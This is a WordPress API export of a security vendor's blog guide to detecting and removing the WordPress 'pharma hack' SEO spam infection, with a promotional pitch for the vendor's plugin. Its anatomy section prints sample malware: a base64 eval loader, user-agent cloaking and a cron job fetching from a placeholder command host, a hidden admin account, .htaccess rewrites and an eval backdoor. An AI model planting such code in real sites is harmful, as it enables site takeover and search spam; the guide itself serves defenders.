{"id":106,"date":"2026-04-29T18:24:00","date_gmt":"2026-04-29T18:24:00","guid":{"rendered":"https:\/\/www.guardiangaze.com\/blog\/?p=106"},"modified":"2026-04-29T18:24:00","modified_gmt":"2026-04-29T18:24:00","slug":"wordpress-pharma-hack","status":"publish","type":"post","link":"https:\/\/www.guardiangaze.com\/blog\/wordpress-pharma-hack\/","title":{"rendered":"WordPress Pharma Hack: Detection, Removal &#038; Prevention (2026 Guide)"},"content":{"rendered":"<p>The <strong>WordPress pharma hack<\/strong> is a black-hat SEO infection that injects pharmaceutical spam (Viagra, Cialis, Tramadol, Phentermine) into your site, but only shows it to Google&#8217;s crawler, not to you. Your homepage looks fine. Your search results are full of &#8220;cheap viagra.&#8221;<\/p>\n<p>The fix:<\/p>\n<ol>\n<li><strong>Confirm cloaking:<\/strong> view your site as Googlebot (not as yourself).<\/li>\n<li><strong>Find the loader:<\/strong> scan <code>wp_options<\/code>, <code>wp_posts<\/code>, theme <code>functions.php<\/code>, <code>mu-plugins\/<\/code>, and any recently modified core file.<\/li>\n<li><strong>Remove every persistence point at once<\/strong> \u2014 file + database + cron + admin user. Missing one means it reinfects in 24 hours.<\/li>\n<li><strong>Request reindexing<\/strong> in Google Search Console once the SERP is clean.<\/li>\n<\/ol>\n<p>The pharma hack survives most &#8220;cleanups&#8221; because it lives in <strong>multiple places simultaneously<\/strong>, including the database where 70% of file-based scanners never look. We&#8217;ll walk through every one of them below.<\/p>\n<h2>Table of Contents<\/h2>\n<ol>\n<li>What is the WordPress pharma hack?<\/li>\n<li>How to confirm your site has it<\/li>\n<li>Why your security plugin missed it<\/li>\n<li>Anatomy of a 2026 pharma infection<\/li>\n<li>Step-by-step removal protocol<\/li>\n<li>Cleaning up Google&#8217;s search results<\/li>\n<li>How to prevent reinfection<\/li>\n<li>FAQ<\/li>\n<\/ol>\n<h2>1. 
What is the WordPress Pharma Hack?<\/h2>\n<p>The WordPress pharma hack, also called the <em>viagra hack<\/em>, <em>pharma SEO spam<\/em>, or <em>blackhat SEO injection, <\/em>is a malware family that turns your site into a free advertising channel for illegal online pharmacies. Attackers compromise the site, then inject spam keywords and links targeting prescription drug terms. The kicker: the spam is <strong>conditional<\/strong>. It shows up only when Googlebot crawls the page, so the site owner has no idea.<\/p>\n<p>You learn about it one of three ways:<\/p>\n<ul>\n<li>A customer messages you saying your site is &#8220;selling Viagra&#8221; in Google.<\/li>\n<li>Your search-console organic traffic falls off a cliff overnight.<\/li>\n<li>Google sends you a manual action notice for &#8220;user-generated spam&#8221; or &#8220;thin content with little or no added value.&#8221;<\/li>\n<\/ul>\n<p>By the time any of those happen, the spam has usually been there for <strong>two to six months<\/strong>. The 2010-era pharma hack used a single backdoor file. The 2025\u20132026 variant uses <strong>five to nine<\/strong> persistence points across files, database options, posts, cron, and even hidden admin users. That is why most cleanup attempts fail and the spam reappears within hours.<\/p>\n<h3>What it looks like in Google<\/h3>\n<p>A pharma-hacked site shows results like:<\/p>\n<pre><code>yoursite.com\/about-us \u2014 Cheap Viagra Online Without Prescription\r\nyoursite.com\/services\/web-design \u2014 Buy Cialis 20mg | $1.30 per pill\r\nyoursite.com\/blog\/2024\/post-title \u2014 Tramadol HCL 50mg \u2605 Free Shipping\r\n<\/code><\/pre>\n<p>You search for <code>site:yoursite.com viagra<\/code> and dozens, sometimes thousands of results appear. Visit any of those URLs in your browser and you see your normal page. That is the cloaking layer doing its job.<\/p>\n<h2>2. How To Confirm Your Site Has The Pharma Hack<\/h2>\n<p>Run these four checks in order. 
The first one that fires is your confirmation.<\/p>\n<h3>Check 1: Search Google directly<\/h3>\n<p>In any browser, run:<\/p>\n<pre><code>site:yourdomain.com viagra\r\nsite:yourdomain.com cialis\r\nsite:yourdomain.com cheap pharmacy\r\nsite:yourdomain.com tramadol\r\n<\/code><\/pre>\n<p>If a single spam result appears, the site is infected. Don&#8217;t bother with the other checks; go straight to removal.<\/p>\n<h3>Check 2: Fetch your site as Googlebot<\/h3>\n<p>Pharma malware almost always cloaks based on User-Agent. Use <code>curl<\/code> from your terminal:<\/p>\n<pre><code class=\"language-bash\"># Fetch as Googlebot\r\ncurl -A \"Mozilla\/5.0 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html)\" \\\r\n  https:\/\/yourdomain.com\/ | head -200\r\n\r\n# Fetch as a normal browser for comparison\r\ncurl -A \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7)\" \\\r\n  https:\/\/yourdomain.com\/ | head -200\r\n<\/code><\/pre>\n<p>If the two outputs differ, with pharma keywords, hidden links, or extra <code>&lt;a&gt;<\/code> tags appearing in the Googlebot version, you have the cloaking variant of the pharma hack.<\/p>\n<p>If you don&#8217;t have terminal access, use the <strong>URL Inspection<\/strong> tool in Google Search Console: paste any page URL \u2192 click <em>View crawled page<\/em> \u2192 <em>More info<\/em> \u2192 <em>HTTP response<\/em> and <em>Page resources<\/em>. Compare with what you see in your browser. Differences are the giveaway.<\/p>\n<h3>Check 3: Check Search Console for manual actions<\/h3>\n<p>In Search Console, go to <em>Security &amp; Manual Actions \u2192 Manual actions<\/em>. 
Common notices for pharma-hacked sites:<\/p>\n<ul>\n<li><strong>User-generated spam<\/strong><\/li>\n<li><strong>Spammy structured markup<\/strong><\/li>\n<li><strong>Cloaking and\/or sneaky redirects<\/strong><\/li>\n<li><strong>Hacked: spam<\/strong><\/li>\n<\/ul>\n<p>Any of these means Google has already detected the infection and is suppressing your rankings.<\/p>\n<h3>Check 4: Inspect the WordPress database for encoded blobs<\/h3>\n<p>Pharma loaders almost always store their payload Base64-encoded in <code>wp_options<\/code>. Run this SQL from phpMyAdmin or the WP-CLI:<\/p>\n<pre><code class=\"language-sql\">SELECT option_name, LENGTH(option_value) AS size\r\nFROM wp_options\r\nWHERE LENGTH(option_value) &gt; 5000\r\n   OR option_value LIKE '%base64_decode%'\r\n   OR option_value LIKE '%eval(%'\r\n   OR option_value LIKE '%str_rot13%'\r\nORDER BY size DESC\r\nLIMIT 20;\r\n<\/code><\/pre>\n<p>Any unfamiliar option with a large encoded value is suspicious. Common malicious option names seen in 2025\u20132026 campaigns: <code>_hdra_core<\/code>, <code>_wp_core_cache<\/code>, <code>_theme_optimization_cache<\/code>, <code>wpsupportplus_data<\/code>, <code>wp_ad_settings<\/code>, <code>_seo_meta_cache<\/code>, <code>widget_jquery_cache<\/code>.<\/p>\n<h2>3. Why Your Security Plugin Missed The Pharma Hack<\/h2>\n<p>Most WordPress site owners run Wordfence, MalCare, iThemes\/SolidWP, or Sucuri Security and assume those will catch it. They almost always don&#8217;t. There are three architectural reasons why.<\/p>\n<h3>Reason 1: The pharma hack lives in the database<\/h3>\n<p>50\u201360% of pharma malware in 2025\u20132026 stores its payload in <code>wp_options<\/code>, <code>wp_posts<\/code>, or <code>wp_postmeta<\/code>. File-based scanners don&#8217;t read these tables. 
Wordfence&#8217;s scan completes &#8220;successfully&#8221; because every PHP file matches its known-good hash and it never opens the database.<\/p>\n<h3>Reason 2: Plugin scanners run inside the same PHP process as the malware<\/h3>\n<p>When a security plugin and the pharma malware live in the same WordPress process, the malware can:<\/p>\n<ul>\n<li>Whitelist itself in the scanner&#8217;s options table.<\/li>\n<li>Modify the scanner&#8217;s hash database so its files appear unchanged.<\/li>\n<li>Hook <code>wp_loaded<\/code> and clear scan results before they save.<\/li>\n<li>Quietly deactivate the scanner via <code>deactivate_plugins()<\/code> and suppress the admin notice.<\/li>\n<\/ul>\n<p>We&#8217;ve documented this pattern across 52,848 sites running Wordfence and observed scanner-tampering rates between <strong>14% and 24%<\/strong>.<\/p>\n<h3>Reason 3: Cloaking-aware malware fingerprints the scanner<\/h3>\n<p>Modern pharma loaders detect when a security plugin is requesting a page (the User-Agent is the plugin&#8217;s, not Googlebot&#8217;s) and serve clean content to fool the scan. The same payload then serves the spam to Googlebot 60 seconds later.<\/p>\n<p>Server-side scanning that runs <strong>outside<\/strong> the PHP process like GuardianGaze&#8217;s edge architecture, sees the actual response Googlebot sees, because malware can&#8217;t fingerprint the scanner from there.<\/p>\n<h2>4. Anatomy of a 2026 Pharma Infection<\/h2>\n<p>Modern pharma campaigns deploy redundant persistence. Here&#8217;s the typical layout we find on a freshly compromised site:<\/p>\n<h3>Persistence point 1: Encoded loader in <code>wp_options<\/code><\/h3>\n<pre><code class=\"language-php\">\/\/ Stored in wp_options as `_hdra_core` or similar\r\n$blob = \"ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsneCddKSk7\"; \/\/ base64\r\n\r\n\/\/ Auto-execute on every page load\r\nadd_action('init', function() {\r\n    $payload = base64_decode(get_option('_hdra_core'));\r\n    eval('?&gt;' . 
$payload);\r\n}, 1);\r\n<\/code><\/pre>\n<p>This loader runs on every request, before any plugin or theme code, and rebuilds the spam pages on the fly.<\/p>\n<h3>Persistence point 2: User-Agent cloaking in <code>functions.php<\/code><\/h3>\n<pre><code class=\"language-php\">\/\/ Injected into the active theme's functions.php\r\nadd_filter('the_content', 'gg_serve_pharma_spam', 999);\r\nfunction gg_serve_pharma_spam($content) {\r\n    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';\r\n    if (preg_match('\/(googlebot|bingbot|yandex|baidu|duckduckbot)\/i', $ua)) {\r\n        $spam = file_get_contents('https:\/\/[malicious-c2].xyz\/spam.txt');\r\n        return $content . '&lt;div style=\"position:absolute;left:-9999px;\"&gt;' . $spam . '&lt;\/div&gt;';\r\n    }\r\n    return $content;\r\n}\r\n<\/code><\/pre>\n<p>Site owners and visitors never see this; only crawlers do.<\/p>\n<h3>Persistence point 3: Spam pages dynamically generated by <code>.htaccess<\/code> rewrite<\/h3>\n<pre><code class=\"language-apache\"># Injected at the top of .htaccess\r\nRewriteEngine On\r\nRewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]\r\nRewriteRule ^(viagra|cialis|tramadol|phentermine)-(.*)\\.html$ \/wp-content\/uploads\/cache\/spam.php?k=$1&amp;u=$2 [L]\r\n<\/code><\/pre>\n<p>Google indexes thousands of fake URLs that resolve to a single spam-generating PHP file in <code>\/wp-content\/uploads\/cache\/<\/code>.<\/p>\n<h3>Persistence point 4: Hidden admin user<\/h3>\n<pre><code class=\"language-sql\">-- An additional administrator that doesn't appear in the WordPress users list\r\n-- because user_status is hacked or the meta_key for 'wp_capabilities' is hidden\r\nINSERT INTO wp_users (user_login, user_pass, user_email, user_registered)\r\nVALUES ('officialwp', '$P$Bx...', 'admin@malicious-c2.xyz', NOW());\r\n<\/code><\/pre>\n<p>This is the foothold that lets attackers reinstall the loader if you remove the file. 
Always check for it.<\/p>\n<h3>Persistence point 5: WP-Cron job<\/h3>\n<pre><code class=\"language-php\">wp_schedule_event(time(), 'hourly', 'gg_pharma_reinstall');\r\nadd_action('gg_pharma_reinstall', function() {\r\n    if (!get_option('_hdra_core')) {\r\n        $remote = wp_remote_get('https:\/\/[malicious-c2].xyz\/loader.txt');\r\n        update_option('_hdra_core', wp_remote_retrieve_body($remote));\r\n    }\r\n});\r\n<\/code><\/pre>\n<p>Even if you find and remove the loader file, the cron job rebuilds it within an hour.<\/p>\n<h3>Persistence point 6: mu-plugins folder<\/h3>\n<p>A single PHP file dropped at <code>\/wp-content\/mu-plugins\/wp-cache-handler.php<\/code> will run on every page load and cannot be deactivated through the WordPress admin. We covered this in detail in our <a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-security-2026-the-complete-defense-guide-against-modern-threats-part-1\/\">Part 1 defense guide<\/a> under the &#8220;officialwp&#8221; campaign analysis.<\/p>\n<p>If you remove only some of these, the most common cleanup outcome, the remaining ones rebuild the rest within minutes.<\/p>\n<h2>5. Step-by-step Pharma Hack Removal Protocol<\/h2>\n<p>Do these in order. Do not skip steps. The pharma hack reinfects from any single missed component.<\/p>\n<h3>Step 0: Take a full backup before touching anything<\/h3>\n<pre><code class=\"language-bash\"># Files\r\ntar -czf preremoval-files-$(date +%Y%m%d-%H%M).tar.gz \/var\/www\/yoursite\/\r\n\r\n# Database\r\nmysqldump -u root -p yoursite_db &gt; preremoval-db-$(date +%Y%m%d-%H%M).sql\r\n<\/code><\/pre>\n<p>Label the backup as <strong>infected<\/strong> so it never gets restored by accident. 
You&#8217;ll need it for forensics if anything goes wrong.<\/p>\n<h3>Step 1: Put the site into maintenance mode<\/h3>\n<p>Drop a <code>.maintenance<\/code> file at the WordPress root (or use <code>wp maintenance-mode activate<\/code>) so the spam pages stop being served while you clean.<\/p>\n<h3>Step 2: Find every recently modified file<\/h3>\n<pre><code class=\"language-bash\"># Files modified in the last 30 days, sorted by mtime\r\nfind \/var\/www\/yoursite\/ -type f -mtime -30 -name \"*.php\" -printf \"%TY-%Tm-%Td %TH:%TM %p\\n\" | sort\r\n\r\n# Files with suspicious one-liners\r\ngrep -rEl \"eval\\s*\\(\\s*base64_decode|str_rot13\\s*\\(.*base64|gzinflate\\s*\\(\\s*base64\" \/var\/www\/yoursite\/\r\n\r\n# Files in unusual locations\r\nfind \/var\/www\/yoursite\/wp-content\/uploads\/ -name \"*.php\"\r\nfind \/var\/www\/yoursite\/wp-includes\/ -name \"*.php\" -newer \/var\/www\/yoursite\/wp-config.php\r\n<\/code><\/pre>\n<p>Any PHP file under <code>\/wp-content\/uploads\/<\/code> is suspicious by default: uploads should never contain executable PHP. 
Quarantine or delete every one of them.<\/p>\n<h3>Step 3: Replace WordPress core, themes, and plugins from clean copies<\/h3>\n<p>Don&#8217;t try to patch infected files; replace them wholesale.<\/p>\n<pre><code class=\"language-bash\"># Back up wp-config.php and wp-content\/uploads\/ first\r\ncp wp-config.php \/tmp\/wp-config.php.safe\r\ncp -r wp-content\/uploads \/tmp\/uploads.safe\r\n\r\n# Re-download core, overwriting existing files (wp-content is left untouched)\r\nwp core download --force --skip-content\r\n\r\n# Reinstall every plugin from the WordPress.org plugin directory\r\nwp plugin list --field=name | xargs -I {} wp plugin install {} --force\r\n\r\n# Reinstall the active theme\r\nwp theme install $(wp theme list --status=active --field=name) --force\r\n\r\n# Restore your backed-up wp-config and uploads\r\n# (the trailing \/. copies the contents instead of nesting uploads.safe inside uploads\/)\r\ncp \/tmp\/wp-config.php.safe wp-config.php\r\ncp -r \/tmp\/uploads.safe\/. wp-content\/uploads\/\r\n<\/code><\/pre>\n<p>If you have nulled or pirated plugins or themes, delete them entirely. They are almost certainly the original entry point.<\/p>\n<h3>Step 4: Clean the <code>mu-plugins<\/code> directory<\/h3>\n<pre><code class=\"language-bash\">ls -la \/var\/www\/yoursite\/wp-content\/mu-plugins\/\r\n<\/code><\/pre>\n<p>Unless you knowingly installed something here, <strong>everything in this directory should be deleted<\/strong>. mu-plugins is a common pharma hack persistence point because it can&#8217;t be deactivated from the admin.<\/p>\n<h3>Step 5: Clean the database<\/h3>\n<p>The most-missed step. 
Run this against your database:<\/p>\n<pre><code class=\"language-sql\">-- Remove suspicious encoded options\r\nDELETE FROM wp_options\r\nWHERE option_name LIKE '\_%core%'\r\n   OR option_name IN ('_hdra_core', '_wp_core_cache',\r\n                      'wpsupportplus_data', 'widget_jquery_cache')\r\n   OR LENGTH(option_value) &gt; 50000\r\n   OR option_value LIKE '%eval(%base64%';\r\n\r\n-- Strip hidden spam div blocks from posts that contain pharma keywords\r\nUPDATE wp_posts\r\nSET post_content = REGEXP_REPLACE(\r\n    post_content,\r\n    '&lt;div[^&gt;]*style[^&gt;]*(absolute|display:none|left:-9999)[^&gt;]*&gt;.*?&lt;\/div&gt;',\r\n    ''\r\n)\r\nWHERE post_content REGEXP '(viagra|cialis|tramadol|phentermine|pharmacy)';\r\n\r\n-- List every administrator, newest first, to spot unauthorized accounts\r\nSELECT u.ID, u.user_login, u.user_email, u.user_registered\r\nFROM wp_users u\r\nINNER JOIN wp_usermeta m ON u.ID = m.user_id\r\nWHERE m.meta_key = 'wp_capabilities'\r\n  AND m.meta_value LIKE '%administrator%'\r\nORDER BY u.user_registered DESC;\r\n\r\n-- Once you've identified rogue admins:\r\nDELETE FROM wp_users WHERE ID = &lt;rogue_id&gt;;\r\nDELETE FROM wp_usermeta WHERE user_id = &lt;rogue_id&gt;;\r\n\r\n-- Review scheduled events for hooks your code did not create\r\nSELECT * FROM wp_options WHERE option_name = 'cron';\r\n-- Remove each rogue hook with WP-CLI: wp cron event delete &lt;hook_name&gt;\r\n<\/code><\/pre>\n<p>Always test your database changes on a copy first, especially the <code>UPDATE wp_posts<\/code> statement.<\/p>\n<h3>Step 6: Clean <code>.htaccess<\/code> and <code>wp-config.php<\/code><\/h3>\n<p>Open both and look for anything you didn&#8217;t put there. 
Common pharma injection patterns:<\/p>\n<pre><code class=\"language-apache\"># in .htaccess\r\n&lt;IfModule mod_rewrite.c&gt;\r\nRewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]\r\nRewriteRule ^(.*)\\.html$ \/wp-content\/uploads\/cache\/spam.php?u=$1 [L]\r\n&lt;\/IfModule&gt;\r\n<\/code><\/pre>\n<pre><code class=\"language-php\">\/\/ in wp-config.php \u2014 anything before the \"&lt;?php\" or after the \"\/* That's all\" line\r\nif (isset($_REQUEST['q'])) { eval(base64_decode($_REQUEST['q'])); }\r\n<\/code><\/pre>\n<p>Replace <code>.htaccess<\/code> with the WordPress default; restore <code>wp-config.php<\/code> from a known-good copy and re-add only your own constants and database credentials.<\/p>\n<h3>Step 7: Rotate every credential<\/h3>\n<p>The original entry point is still on your server until you change credentials. Rotate:<\/p>\n<ul>\n<li>WordPress admin passwords (force reset for <strong>all<\/strong> users, not just admins)<\/li>\n<li>Database password (<code>wp-config.php<\/code> + the MySQL user)<\/li>\n<li>SFTP\/SSH passwords or keys<\/li>\n<li>Hosting control panel password<\/li>\n<li>API keys for any service the site connects to<\/li>\n<\/ul>\n<p>In WP-CLI:<\/p>\n<pre><code class=\"language-bash\">wp user list --field=ID | xargs -I {} wp user reset-password {}\r\n<\/code><\/pre>\n<h3>Step 8: Add new salts in <code>wp-config.php<\/code><\/h3>\n<pre><code class=\"language-bash\"># Generate fresh salts and replace the AUTH_KEY block in wp-config.php\r\ncurl https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/\r\n<\/code><\/pre>\n<p>This invalidates every session cookie, including the attacker&#8217;s.<\/p>\n<h3>Step 9: Rescan with a server-side scanner<\/h3>\n<p>A plugin scanner is the wrong tool to <em>verify<\/em> a cleanup, because the same architectural problem applies. Use a server-side scan that runs outside the WordPress PHP environment. 
GuardianGaze does this by default; you can also run a one-off scan from a clean cron job:<\/p>\n<pre><code class=\"language-bash\"># Quick external check\r\ngrep -rEl \"eval\\s*\\(|base64_decode|str_rot13|gzinflate\" \/var\/www\/yoursite\/ \\\r\n  | grep -v \"wp-includes\/\" | grep -v \"vendor\/\"\r\n<\/code><\/pre>\n<p>If any matches come back, repeat steps 2\u20136.<\/p>\n<h2>6. Cleaning Up Google&#8217;s Search Results<\/h2>\n<p>Removing the pharma hack from your server is only half the job. Google still has thousands of spammed URLs in its index. Until those are removed, your search snippets still advertise illegal drugs.<\/p>\n<h3>1. Verify the site in Google Search Console<\/h3>\n<p>If it&#8217;s not already verified, do that first.<\/p>\n<h3>2. Submit a reconsideration request (if you got a manual action)<\/h3>\n<p>Go to <em>Security &amp; Manual Actions \u2192 Manual actions \u2192 Request review<\/em>. In the request, include:<\/p>\n<ul>\n<li>A short description of the infection (&#8220;pharma SEO spam, fully removed&#8221;).<\/li>\n<li>The exact steps you took (paraphrase steps 2\u20138 above).<\/li>\n<li>A statement that you&#8217;ve enabled prevention measures (server-side scanning, 2FA, etc.).<\/li>\n<\/ul>\n<p>Reviews typically take 3\u201310 days.<\/p>\n<h3>3. Force re-crawl of clean pages<\/h3>\n<p>For your top 20 most important pages, use <em>URL Inspection \u2192 Request indexing<\/em>. This pushes Google to recrawl them within hours.<\/p>\n<h3>4. Remove individual spam URLs<\/h3>\n<p>For each spammed URL still appearing in <em>site:<\/em> searches:<\/p>\n<ul>\n<li>Use Search Console \u2192 <em>Indexing \u2192 Removals \u2192 Temporary removals<\/em> \u2192 submit the URL.<\/li>\n<li>Make sure the URL returns a real <strong>404<\/strong> or <strong>410<\/strong> to crawlers \u2014 not a soft 404 that 200&#8217;s with empty content.<\/li>\n<\/ul>\n<h3>5. 
Submit an updated XML sitemap<\/h3>\n<p>Generate a fresh sitemap (Yoast, RankMath, or <code>wp sitemap generate<\/code>) and submit it in Search Console. This signals which URLs are real and helps Google deindex the rest.<\/p>\n<h3>6. Track recovery<\/h3>\n<p>In Search Console <em>Performance<\/em> report, watch for:<\/p>\n<ul>\n<li>Impressions on pharma keywords dropping to zero (typically within 14\u201330 days).<\/li>\n<li>Impressions on your real keywords recovering (typically within 30\u201390 days).<\/li>\n<\/ul>\n<p>Full SEO recovery from a pharma hack runs <strong>3\u20136 months<\/strong> for most sites. The longer the spam was indexed, the longer recovery takes. We covered this timeline in detail in our <a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-security-what-most-site-owners-miss\/\">post on what most site owners miss about WordPress security<\/a>.<\/p>\n<h2>7. How To Prevent Reinfection<\/h2>\n<p>Most pharma reinfections happen within 14 days of cleanup, and the cause is almost always one of these four:<\/p>\n<h3>1. The original entry point was never closed<\/h3>\n<p>If a vulnerable plugin let attackers in, removing the malware without updating the plugin guarantees reinfection. Audit:<\/p>\n<ul>\n<li>All plugins listed in <a href=\"https:\/\/wpscan.com\/plugins\/\">WPScan&#8217;s vulnerability database<\/a>.<\/li>\n<li>Any plugin you haven&#8217;t updated in 6+ months.<\/li>\n<li>Any plugin that hasn&#8217;t been updated by its author in 6+ months, even if you&#8217;re on the latest version, that plugin is abandoned and likely vulnerable.<\/li>\n<\/ul>\n<h3>2. Cleanup was only file-based<\/h3>\n<p>If you cleaned PHP files but left the database loader in <code>wp_options<\/code>, the cron rebuilds the spam within an hour. Always do steps 5\u20136 of the removal protocol.<\/p>\n<h3>3. No virtual patching for the next zero-day<\/h3>\n<p>A vulnerability disclosed today is being exploited within four hours. 
The official plugin patch typically arrives 7\u201314 days later. That gap is when reinfections happen. Virtual patching closes the gap by blocking the exploit pattern at the WAF layer <strong>before<\/strong> the official fix exists. This is the single biggest reduction in repeat-pharma cases we see.<\/p>\n<h3>4. The host&#8217;s neighboring sites are still infected<\/h3>\n<p>On shared hosting, if any other site on the server is compromised, attackers can pivot to yours via cross-site contamination. Move to isolated hosting (VPS, managed WordPress with account isolation, or single-tenant cloud) if you&#8217;ve been hit more than once.<\/p>\n<h3>A Prevention Checklist That Actually Works<\/h3>\n<ul>\n<li>Server-side malware scanning (runs outside the WordPress PHP process so malware can&#8217;t tamper with it).<\/li>\n<li>WAF with virtual patching for the top 200 plugin vulnerabilities.<\/li>\n<li>2FA enforced for every administrator (no exceptions).<\/li>\n<li><code>DISALLOW_FILE_EDIT<\/code> and <code>DISALLOW_FILE_MODS<\/code> in <code>wp-config.php<\/code>.<\/li>\n<li>PHP execution disabled in <code>\/wp-content\/uploads\/<\/code>.<\/li>\n<li>Daily off-server backups, restored quarterly to verify they work.<\/li>\n<li>Plugin and theme audits every quarter, remove anything not actively maintained.<\/li>\n<li>Removed every nulled or pirated plugin\/theme. No exceptions.<\/li>\n<li>Database scanning enabled (the part most plugins skip).<\/li>\n<li>Hidden-admin-user detection enabled.<\/li>\n<\/ul>\n<p>GuardianGaze ships all of these by default. If you&#8217;ve cleaned a pharma hack once and don&#8217;t want to do it again, <a href=\"https:\/\/wordpress.org\/plugins\/guardian-gaze\/\">start with the free plan<\/a> and the prevention layer will catch the next attempt before it lands.<\/p>\n<h2>8. Frequently asked questions<\/h2>\n<p><strong>Why do I see Viagra results in Google but my website looks normal?<\/strong><\/p>\n<p>Pharma hacks use User-Agent cloaking. 
They serve spam to Googlebot and a clean page to you. Fetch your site with <code>curl -A \"Googlebot\"<\/code> to see what Google sees.<\/p>\n<p><strong>Will my SEO recover after removing the pharma hack?<\/strong><\/p>\n<p>Usually yes, but it takes 30\u2013180 days depending on how long the spam was indexed. Sites caught within two weeks recover almost fully; sites infected for over a year often see permanent rank drops on competitive keywords.<\/p>\n<p><strong>Why does the pharma hack keep coming back after I cleaned it?<\/strong><\/p>\n<p>Because pharma malware deploys 5\u20139 persistence points: files, database options, cron jobs, hidden admins, mu-plugins, and <code>.htaccess<\/code> rules. Cleanups that miss any one of them get reinfected within hours. Follow steps 1\u20138 above in order, no exceptions.<\/p>\n<p><strong>Can Wordfence or MalCare detect the pharma hack?<\/strong><\/p>\n<p>File-based scanners catch the file-resident variants but miss the 50\u201360% of pharma malware that lives in the database. They also operate inside the WordPress PHP process, which sophisticated pharma loaders can fingerprint and evade. Server-side scanning that runs outside WordPress is more reliable.<\/p>\n<p><strong>Should I just restore from a backup?<\/strong><\/p>\n<p>Only if the backup is provably from before the infection. Pharma hacks often sit dormant for weeks before activating, so a backup from &#8220;two months ago&#8221; is frequently already infected. 
If you do restore, run the full removal protocol against the restored site as if it were a fresh infection.<\/p>\n<p><strong>How did my site get the pharma hack in the first place?<\/strong><\/p>\n<p>The most common entry points in 2025\u20132026: an outdated plugin with a known CVE (60% of cases), a nulled premium plugin or theme (20%), a weak admin password exploited by brute force (10%), and a compromised neighbor site on shared hosting (10%).<\/p>\n<p><strong>Do I need to tell my visitors?<\/strong><\/p>\n<p>If you collect personal data (logins, payments, contact info) and the attacker had file-system access, you may have a notification obligation under GDPR (Article 33), CCPA, or similar laws. When in doubt, consult a lawyer but the bar is &#8220;could the attacker have accessed personal data,&#8221; and on a typical pharma-hacked WordPress install the answer is yes.<\/p>\n<p><strong>How much does professional pharma hack removal cost?<\/strong><\/p>\n<p>Sucuri and Wordfence Care charge $200\u2013$500 for a one-off cleanup. Specialist agencies charge $500\u2013$2,000. The cleanup is the easy part; the harder part is closing the entry point and preventing reinfection, which is why most &#8220;cheap&#8221; cleanups bounce back.<\/p>\n<h2>Continue Reading<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-hacked-signs-and-fix\/\">Website Hacked? 
17 Signs Your WordPress Site Is Compromised: <\/a>early-warning checklist.<\/li>\n<li><a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-malware-removal-2026-complete-detection-removal-protocols\/\">WordPress Malware Removal 2026: Complete Detection &amp; Removal Protocols:<\/a>\u00a0the broader removal playbook.<\/li>\n<li><a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-security-2026-the-complete-defense-guide-against-modern-threats-part-1\/\">WordPress Security 2026 Part 1: Modern Threats: <\/a>why traditional plugins miss this class of attack.<\/li>\n<\/ul>\n<p><strong>Stop the pharma hack from coming back.<\/strong> GuardianGaze runs server-side scans, virtual patching, and database-resident malware detection, the three things ordinary WordPress security plugins can&#8217;t do. <a href=\"https:\/\/wordpress.org\/plugins\/guardian-gaze\/\">Get the free plugin<\/a> or <a href=\"https:\/\/www.guardiangaze.com\/subscription\/\">see paid plans<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The WordPress pharma hack is a black-hat SEO infection that injects pharmaceutical spam (Viagra, Cialis, Tramadol, Phentermine) into your site, but 
only&hellip;<\/p>\n","protected":false},"author":1,"featured_media":110,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[13],"class_list":["post-106","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","tag-pharma"],"_links":{"self":[{"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/posts\/106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/comments?post=106"}],"version-history":[{"count":3,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/posts\/106\/revisions"}],"predecessor-version":[{"id":109,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/posts\/106\/revisions\/109"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/media\/110"}],"wp:attachment":[{"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/media?parent=106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/categories?post=106"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/tags?post=106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}